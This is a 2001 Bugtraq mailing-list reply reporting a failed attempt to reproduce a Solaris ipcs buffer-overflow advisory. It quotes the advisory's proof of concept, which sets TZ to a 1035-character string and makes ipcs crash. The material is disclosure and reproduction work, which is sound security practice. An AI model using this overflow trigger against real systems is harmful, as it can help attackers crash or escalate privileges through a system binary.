[20227] in bugtraq

Re: Solaris ipcs vulnerability

daemon@ATHENA.MIT.EDU (Mike Batchelor)
Mon Apr 16 14:02:44 2001

Message-ID:  <LLEOLJEDPHOFANPCPKOMOEJGCCAA.mikebat@tmcs.net>
Date:         Mon, 16 Apr 2001 07:22:15 -0700
Reply-To: Mike Batchelor <mikebat@TMCS.NET>
From: Mike Batchelor <mikebat@TMCS.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

Failed to reproduce this problem on Solaris 2.6 and 8 for SPARC.  Ipcs
behaved normally, except for printing out the long string of "A"'s in the
output header where the timezone would appear.

> Solaris ipcs vulnerability
>
> Release Date:
> April 11, 2001
>
> Systems Affected:
> Solaris 7 (x86)
> Other versions of Solaris are most likely affected also.
>
> Discovered by:
> Riley Hassell riley@eeye.com
>
> bash-2.03$ TZ=`perl -e 'print "A"x1035'`
> bash-2.03$ /usr/bin/i86/ipcs
> IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
> Message Queue facility inactive.
> T ID KEY MODE OWNER GROUP
> Shared Memory:
> m 0 0x500004d3 --rw-r--r-- root root
> Semaphore facility inactive.
> Segmentation Fault (core dumped)
